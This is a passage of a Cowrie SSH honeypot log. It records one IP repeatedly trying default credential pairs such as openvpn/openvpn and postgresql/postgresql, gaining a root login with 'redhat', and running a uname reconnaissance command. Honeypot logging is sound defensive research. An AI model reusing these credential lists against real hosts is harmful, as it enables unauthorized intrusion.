256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:04:36.949004Z","src_ip":"212.227.125.160","session":"30e17c5c1489"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator","message":"login attempt [operator/operator] failed","sensor":"my-vps","timestamp":"2025-08-26T22:04:37.144022Z","src_ip":"212.227.125.160","session":"30e17c5c1489"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:04:38.198158Z","src_ip":"212.227.125.160","session":"30e17c5c1489"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52518,"dst_ip":"1.2.3.4","dst_port":22,"session":"d54a1436e64a","protocol":"ssh","message":"New connection: 212.227.125.160:52518 (1.2.3.4:22) [session: d54a1436e64a]","sensor":"my-vps","timestamp":"2025-08-26T22:04:42.606610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:04:42.607885Z","src_ip":"212.227.125.160","session":"d54a1436e64a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:04:42.653640Z","src_ip":"212.227.125.160","session":"d54a1436e64a"}
{"eventid":"cowrie.login.failed","username":"kingbase","password":"123456","message":"login attempt [kingbase/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:04:42.800878Z","src_ip":"212.227.125.160","session":"d54a1436e64a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:04:43.851180Z","src_ip":"212.227.125.160","session":"d54a1436e64a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47904,"dst_ip":"1.2.3.4","dst_port":22,"session":"56a813ea386d","protocol":"ssh","message":"New connection: 212.227.125.160:47904 (1.2.3.4:22) [session: 56a813ea386d]","sensor":"my-vps","timestamp":"2025-08-26T22:04:48.062050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:04:48.124643Z","src_ip":"212.227.125.160","session":"56a813ea386d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:04:48.125554Z","src_ip":"212.227.125.160","session":"56a813ea386d"}
{"eventid":"cowrie.login.failed","username":"cbm","password":"cbm","message":"login attempt [cbm/cbm] failed","sensor":"my-vps","timestamp":"2025-08-26T22:04:48.398325Z","src_ip":"212.227.125.160","session":"56a813ea386d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:04:49.485404Z","src_ip":"212.227.125.160","session":"56a813ea386d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43288,"dst_ip":"1.2.3.4","dst_port":22,"session":"3334c2927c84","protocol":"ssh","message":"New connection: 212.227.125.160:43288 (1.2.3.4:22) [session: 3334c2927c84]","sensor":"my-vps","timestamp":"2025-08-26T22:04:53.665193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:04:53.665958Z","src_ip":"212.227.125.160","session":"3334c2927c84"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:04:53.714037Z","src_ip":"212.227.125.160","session":"3334c2927c84"}
{"eventid":"cowrie.login.failed","username":"openvpn","password":"openvpn","message":"login attempt [openvpn/openvpn] failed","sensor":"my-vps","timestamp":"2025-08-26T22:04:53.863243Z","src_ip":"212.227.125.160","session":"3334c2927c84"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:04:54.935225Z","src_ip":"212.227.125.160","session":"3334c2927c84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38674,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7c24bb2467b","protocol":"ssh","message":"New connection: 212.227.125.160:38674 (1.2.3.4:22) [session: a7c24bb2467b]","sensor":"my-vps","timestamp":"2025-08-26T22:04:59.174107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:04:59.183190Z","src_ip":"212.227.125.160","session":"a7c24bb2467b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:04:59.247335Z","src_ip":"212.227.125.160","session":"a7c24bb2467b"}
{"eventid":"cowrie.login.failed","username":"odoo16","password":"odoo16","message":"login attempt [odoo16/odoo16] failed","sensor":"my-vps","timestamp":"2025-08-26T22:04:59.586763Z","src_ip":"212.227.125.160","session":"a7c24bb2467b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:05:00.963128Z","src_ip":"212.227.125.160","session":"a7c24bb2467b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34058,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dcea0530339","protocol":"ssh","message":"New connection: 212.227.125.160:34058 (1.2.3.4:22) [session: 0dcea0530339]","sensor":"my-vps","timestamp":"2025-08-26T22:05:05.254528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:05:05.256162Z","src_ip":"212.227.125.160","session":"0dcea0530339"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:05:05.316968Z","src_ip":"212.227.125.160","session":"0dcea0530339"}
{"eventid":"cowrie.login.failed","username":"chetana","password":"chetana","message":"login attempt [chetana/chetana] failed","sensor":"my-vps","timestamp":"2025-08-26T22:05:05.870618Z","src_ip":"212.227.125.160","session":"0dcea0530339"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:05:06.952187Z","src_ip":"212.227.125.160","session":"0dcea0530339"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57674,"dst_ip":"1.2.3.4","dst_port":22,"session":"13aa27bf14ad","protocol":"ssh","message":"New connection: 212.227.125.160:57674 (1.2.3.4:22) [session: 13aa27bf14ad]","sensor":"my-vps","timestamp":"2025-08-26T22:05:12.124467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:05:12.138886Z","src_ip":"212.227.125.160","session":"13aa27bf14ad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:05:12.184299Z","src_ip":"212.227.125.160","session":"13aa27bf14ad"}
{"eventid":"cowrie.login.success","username":"root","password":"redhat","message":"login attempt [root/redhat] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:05:12.727437Z","src_ip":"212.227.125.160","session":"13aa27bf14ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:05:12.921036Z","src_ip":"212.227.125.160","session":"13aa27bf14ad"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:05:12.921862Z","src_ip":"212.227.125.160","session":"13aa27bf14ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:05:13.026840Z","src_ip":"212.227.125.160","session":"13aa27bf14ad"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:05:13.028070Z","src_ip":"212.227.125.160","session":"13aa27bf14ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53052,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9770c7962a9","protocol":"ssh","message":"New connection: 212.227.125.160:53052 (1.2.3.4:22) [session: e9770c7962a9]","sensor":"my-vps","timestamp":"2025-08-26T22:05:18.016173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:05:18.093232Z","src_ip":"212.227.125.160","session":"e9770c7962a9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:05:18.094437Z","src_ip":"212.227.125.160","session":"e9770c7962a9"}
{"eventid":"cowrie.login.failed","username":"applmgr","password":"applmgr","message":"login attempt [applmgr/applmgr] failed","sensor":"my-vps","timestamp":"2025-08-26T22:05:18.312946Z","src_ip":"212.227.125.160","session":"e9770c7962a9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:05:19.367458Z","src_ip":"212.227.125.160","session":"e9770c7962a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48660,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b7463853c51","protocol":"ssh","message":"New connection: 212.227.125.160:48660 (1.2.3.4:22) [session: 0b7463853c51]","sensor":"my-vps","timestamp":"2025-08-26T22:05:23.530993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:05:23.696314Z","src_ip":"212.227.125.160","session":"0b7463853c51"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:05:23.697060Z","src_ip":"212.227.125.160","session":"0b7463853c51"}
{"eventid":"cowrie.login.failed","username":"postgresql","password":"postgresql","message":"login attempt [postgresql/postgresql] failed","sensor":"my-vps","timestamp":"2025-08-26T22:05:24.696360Z","src_ip":"212.227.125.160","session":"0b7463853c51"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:05:25.760306Z","src_ip":"212.227.125.160","session":"0b7463853c51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43830,"dst_ip":"1.2.3.4","dst_port":22,"session":"20ddea37ec6b","protocol":"ssh","message":"New connection: 212.227.125.160:43830 (1.2.3.4:22) [session: 20ddea37ec6b]","sensor":"my-vps","timestamp":"2025-08-26T22:05:30.154583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:05:30.156369Z","src_ip":"212.227.125.160","session":"20ddea37ec6b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:05:30.200056Z","src_ip":"212.227.125.160","session":"20ddea37ec6b"}
{"eventid":"cowrie.login.failed","username":"cxvqo","password":"cxvqo","message":"login attempt [cxvqo/cxvqo] failed","sensor":"my-vps","timestamp":"2025-08-26T22:05:30.384052Z","src_ip":"212.227.125.160","session":"20ddea37ec6b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:05:31.459466Z","src_ip":"212.227.125.160","session":"20ddea37ec6b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39214,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9db6622c9bf","protocol":"ssh","message":"New connection: 212.227.125.160:39214 (1.2.3.4:22) [session: d9db6622c9bf]","sensor":"my-vps","timestamp":"2025-08-26T22:05:35.610599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:05:35.617155Z","src_ip":"212.227.125.160","session":"d9db6622c9bf"}
